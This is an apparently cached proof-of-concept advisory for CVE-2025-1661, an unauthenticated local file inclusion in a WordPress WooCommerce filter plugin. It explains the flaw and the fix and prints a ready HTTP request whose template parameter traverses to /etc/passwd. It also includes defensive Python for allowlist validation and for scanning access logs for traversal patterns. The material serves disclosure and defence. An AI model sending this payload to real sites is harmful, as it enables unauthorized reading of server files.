PoC details: abd584cc2b3973d0d330383055e68a12cde8d6f4

Source
Related vulnerability
Title: WordPress plugin HUSKY Products Filter Professional for WooCommerce path traversal vulnerability (CVE-2025-1661)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP; it lets users host a personal blog on a server running PHP and MySQL. A WordPress plugin is an application add-on for that platform. The WordPress plugin HUSKY Products Filter Professional for WooCommerce, in version 1.3.6.5 and earlier, contains a path traversal vulnerability that stems from the `template` parameter of the `woof_text_search` AJAX action.
Description
The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion (LFI).
Introduction
# CVE-2025-1661 - Unauthenticated Local File Inclusion (LFI) in HUSKY – Products Filter Professional for WooCommerce

## Description

The **HUSKY – Products Filter Professional for WooCommerce** plugin for WordPress is vulnerable to **Local File Inclusion (LFI)** in all versions up to and including **1.3.6.5** via the `template` parameter of the `woof_text_search` AJAX action.

This allows **unauthenticated attackers** to include and execute arbitrary files on the server, potentially leading to:

- **Bypassing access controls**
- **Extracting sensitive data**
- **Remote Code Execution (RCE)** if certain conditions are met (e.g., upload of "safe" file types)
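The root cause described above is a request-supplied `template` value reaching a file include unchecked. The defensive pattern that closes this class of bug is to treat the parameter as a template *name*, not a path: validate it syntactically, check it against an allowlist, and confirm the resolved path stays inside a fixed directory. The Python below is an added, illustrative implementation of that pattern; it is not the HUSKY plugin's code, and the template directory and allowlist names are assumed values.

```python
import posixpath
import re

# Assumed values for illustration only (not the plugin's real layout or template set).
TEMPLATE_DIR = "/var/www/html/wp-content/plugins/example-filter/templates"
ALLOWED_TEMPLATES = {"default", "compact", "grid"}

# Syntactic allowlist: lowercase letters, digits, '-' and '_' only.
# This alone excludes '/', '\\', '.', NUL and any percent-encoding.
_NAME_RE = re.compile(r"[a-z0-9_-]{1,64}")


class TemplateRejected(ValueError):
    """Raised when a request-supplied template name fails validation."""


def resolve_template(user_value, base_dir=TEMPLATE_DIR):
    """Map a template name from the request onto an absolute .php path, or raise.

    Three independent checks; each one on its own stops a traversal payload
    such as '../../../../../../../etc/passwd':
      1. strict syntax on the name,
      2. membership in the known-template allowlist,
      3. lexical containment of the normalised path under base_dir.
    The third check is redundant while the allowlist holds, but it keeps the
    function safe if the allowlist is later loosened to accept more names.
    """
    if not isinstance(user_value, str) or not _NAME_RE.fullmatch(user_value):
        raise TemplateRejected("template name fails syntax check")
    if user_value not in ALLOWED_TEMPLATES:
        raise TemplateRejected("template name is not in the allowlist")

    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, user_value + ".php"))
    # commonpath() collapses the '..' segments; anything that escaped base is rejected.
    if posixpath.commonpath([base, candidate]) != base:
        raise TemplateRejected("resolved path escapes the template directory")
    return candidate


def is_accepted(user_value):
    """Convenience wrapper: True if resolve_template() would allow the value."""
    try:
        resolve_template(user_value)
    except TemplateRejected:
        return False
    return True


if __name__ == "__main__":
    # Constructed inputs: one benign name, then shapes a traversal or wrapper abuse would take.
    for value in ["default", "../../../../../../../etc/passwd", "default/../../wp-config",
                  "php://filter/convert.base64-encode/resource=index", "", "default\x00"]:
        print(repr(value), "->", "accepted" if is_accepted(value) else "rejected")
```

Only the name ever reaches the include call; the server-side code, not the client, chooses the directory and the `.php` suffix. Applied to the request in this advisory, the value in the `template` parameter fails the first check before any path is built.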

## Severity: **Critical**

- **CVSS Score:** 9.8 (**Critical**)
- **CWE ID:** CWE-22 (Path Traversal)
- **EPSS Score:** 0.00061

## Affected Versions

- **Vulnerable:** `<= 1.3.6.5`
- **Patched Version:** `1.3.6.6`

## Remediation

Update to version **1.3.6.6** or a newer patched version.

---

## Proof of Concept (PoC)

### Steps to Reproduce

1. Visit the target website.
2. Capture the request using **Burp Suite**.
3. Modify the request method to **POST** and add the following payload:

   ```http
   POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1 HTTP/1.1
   Host: TARGET_SITE_HERE
   Cache-Control: max-age=0
   Accept-Language: en-US,en;q=0.9
   Upgrade-Insecure-Requests: 1
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
   Accept-Encoding: gzip, deflate, br
   Cookie: YOUR_SESSION_COOKIE_HERE
   Connection: keep-alive
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 24

   action=woof_text_search&
   ```

   ![IntercomVulnChecker Screenshot](lfi.png)

4. If successful, the server will return the contents of `/etc/passwd`.
5. This can be used to extract other sensitive files from the server.
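From the defender's side, the request above leaves a clear trace: a request to `/wp-admin/admin-ajax.php` whose `template` query parameter carries `../` sequences or a system file path. The Python below is an added detection example, not part of the original PoC, that scans web-server access log lines in the common/combined format for that pattern, decoding the parameter repeatedly so that double-encoded variants (`%252e%252e%252f`) are caught as well. The log lines are constructed samples; the IP address and timestamps are not from any real incident.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Common/combined access-log prefix: ip ident user [ts] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators inside a decoded parameter value: directory traversal, a well-known
# sensitive file, a PHP stream wrapper, or an embedded NUL.
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\|/etc/passwd|php://|\x00)', re.IGNORECASE)


def decode_fully(value, rounds=3):
    """Percent-decode until stable (bounded), so double encoding does not hide '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_line(line):
    """Return a finding dict for an admin-ajax.php request with a traversal-looking
    query parameter, or None for anything else (including unparseable lines)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    suspicious = []
    # parse_qs already percent-decodes once; decode_fully handles further layers.
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        for raw in values:
            decoded = decode_fully(raw)
            if TRAVERSAL_RE.search(decoded):
                suspicious.append((key, decoded))
    if not suspicious:
        return None
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "status": int(m.group("status")),
        "params": suspicious,
    }


def scan_access_log(lines):
    """Scan an iterable of log lines and return the list of findings in order."""
    return [f for f in (analyze_line(l) for l in lines) if f is not None]


# Constructed sample lines: the advisory's request, a double-encoded variant,
# a benign filter request, and an unrelated page view.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Mar/2025:14:02:11 +0000] "POST /wp-admin/admin-ajax.php'
    '?template=../../../../../../../etc/passwd&value=a&min_symbols=1 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [10/Mar/2025:14:02:19 +0000] "POST /wp-admin/admin-ajax.php'
    '?template=%252e%252e%252f%252e%252e%252fetc%252fpasswd&value=a&min_symbols=1 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2025:14:03:02 +0000] "POST /wp-admin/admin-ajax.php'
    '?template=default&value=shoe&min_symbols=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2025:14:03:05 +0000] "GET /index.php HTTP/1.1" 200 9012 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding["ts"], finding["ip"], finding["status"], finding["params"])
```

Two caveats for operating this. The `action=woof_text_search` value travels in the POST body, which standard access logs do not record, so the query-string traversal is the signal available from logs alone; confirming the action requires WAF or request-body logging. And a `200` with a body size comparable to `/etc/passwd`, as in the first two sample lines, is the cue that the include succeeded rather than merely being attempted, which is what separates a scan from a compromise during triage.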

---

## References

- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-products-filter/husky-products-filter-professional-for-woocommerce-1365-unauthenticated-local-file-inclusion)
- [WordPress Plugin Code](https://plugins.trac.wordpress.org/browser/woocommerce-products-filter/trunk/ext/by_text/index.php)
- [CVE Report](https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae7b6fc-2120-4573-8b1b-d5422d435fa5?source=cve)

---
## Disclaimer

This PoC is for **educational and research purposes only**. Unauthorized testing against systems without permission is illegal and unethical. Always seek **explicit authorization** before conducting any security testing.
File snapshot

```
[4.0K] /data/pocs/abd584cc2b3973d0d330383055e68a12cde8d6f4
├── [283K] lfi.png
└── [2.7K] README.md

0 directories, 2 files
```

Cached for you by the Shenlong bot
Notes
    1. Accessing the PoC through the original source is recommended.
    2. If the source is no longer available or cannot be reached, e-mail f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.